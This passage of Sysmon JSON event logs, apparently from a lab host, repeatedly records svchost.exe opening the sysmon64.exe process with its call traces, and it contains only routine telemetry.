C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 